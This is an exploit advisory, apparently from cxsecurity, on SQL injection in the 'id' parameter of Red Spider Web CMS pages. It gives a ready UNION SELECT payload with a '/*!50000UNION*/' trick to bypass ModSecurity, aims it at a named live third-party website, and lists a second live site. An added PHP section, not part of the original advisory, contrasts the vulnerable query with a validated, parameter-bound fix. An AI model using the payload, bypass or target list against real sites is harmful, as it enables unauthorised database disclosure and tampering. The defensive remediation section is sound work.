R.s.W - Sql Injection

2025.12.14
Credit: Itqchi
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

*********************************************************
# Exploit Title: SQL Injection – Red Spider Web CMS
# Date: 2025-12-11
# Exploit Author: ITACHI - SELI
# Category: Web Applications
# Tested on: Windows 10 / Kali Linux
# CVE: Not Assigned
*********************************************************

## Summary

A SQL Injection vulnerability was discovered in multiple websites developed using the Red Spider Web CMS. The issue exists in the "id" parameter of pages like project.php, pic.php, and gallery.php, where user input is not properly sanitized.

*********************************************************

### Dom

https://www.jbshowrah.com/project.php?id=47'/*!50000UNION/**_**/*//*!50000SELECT/**_**/*/ database(),2,3--+
https://www.oarindia.org/gallery.php?id=1

*********************************************************

#### Waf: Mod_Security
##### bypass waf: /*!50000UNION*/

*********************************************************

### Vulnerability

The id parameter is directly passed into SQL queries without validation. Adding special characters (e.g., ') triggers SQL errors, confirming injection vulnerability.

*********************************************************

Example test input: ?id=-1'

## Impact

- Database information disclosure
- Possible authentication bypass
- Data manipulation or deletion
- Potential full database compromise
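As an added example that is not part of this advisory or of the Red Spider Web CMS code, the PHP below sketches the pattern the advisory describes for the id parameter of a page like project.php (the value spliced straight into SQL text) beside a hardened version that validates the parameter as an integer and binds it. The table name `projects`, its columns, the function names and the in-memory SQLite demo are all assumptions made for the example.

```php
<?php
// Added example (not Red Spider Web CMS code): a hypothetical project.php
// handler in its vulnerable form and in a hardened form. The `projects`
// table, its columns and the SQLite in-memory demo are assumptions.

declare(strict_types=1);

// BEFORE: the pattern the advisory describes. The raw id value is spliced into
// the SQL text, so a quote in ?id= closes the literal and everything after it
// is parsed as SQL; a database error on a stray quote is the symptom described.
function fetchProjectVulnerable(PDO $db, array $get): ?array
{
    $id = $get['id'] ?? '';
    $sql = "SELECT id, title FROM projects WHERE id = '$id'";   // untrusted input in SQL text
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// AFTER: accept only a positive integer and pass it as a bound parameter.
// The value never becomes part of the SQL text, so quote characters and MySQL
// version comments such as /*!50000UNION*/ cannot alter the statement; they
// simply fail integer validation and never reach the database.
function fetchProjectSafe(PDO $db, array $get): ?array
{
    $id = filter_var($get['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;   // caller answers 400 Bad Request; no query is issued
    }
    $stmt = $db->prepare('SELECT id, title FROM projects WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Demo against an in-memory SQLite database so it runs without a MySQL server.
// In the CMS the DSN would be mysql:..., and ATTR_EMULATE_PREPARES => false
// makes the driver use real server-side prepared statements.
$db = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);
$db->exec('CREATE TABLE projects (id INTEGER PRIMARY KEY, title TEXT NOT NULL)');
$db->exec("INSERT INTO projects (id, title) VALUES (47, 'Sample project')");

// Constructed request inputs: a normal id, the advisory's quote probe, and an
// out-of-range value.
$inputs = [
    ['id' => '47'],
    ['id' => "47'"],
    ['id' => '-1'],
];

foreach ($inputs as $get) {
    $result = fetchProjectSafe($db, $get);
    printf("id=%s -> %s\n", var_export($get['id'], true),
           $result === null ? 'rejected / not found' : 'row ' . json_encode($result));
}
```

Only the first input returns a row; the other two are rejected before any SQL runs. Two further points for the deployed fix: catch `PDOException` and log it rather than echoing it (and keep `display_errors` off in production), since the advisory relies on the error text a stray quote produces; and note that the bound parameter, not the WAF, is what closes the hole, because a rule that matches a literal `UNION SELECT` is exactly what the `/*!50000UNION*/` form sidesteps.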

References:

ITACHI – SELI telegram: @ir_itachi_ir Channel:
https://t.me/IR_ITACHI_1_UCHIHA_IR
Channel:
https://t.me/Selii_404
Email: IRITACHIUCHIHAIR@GMAIL.COM


Copyright 2025, cxsecurity.com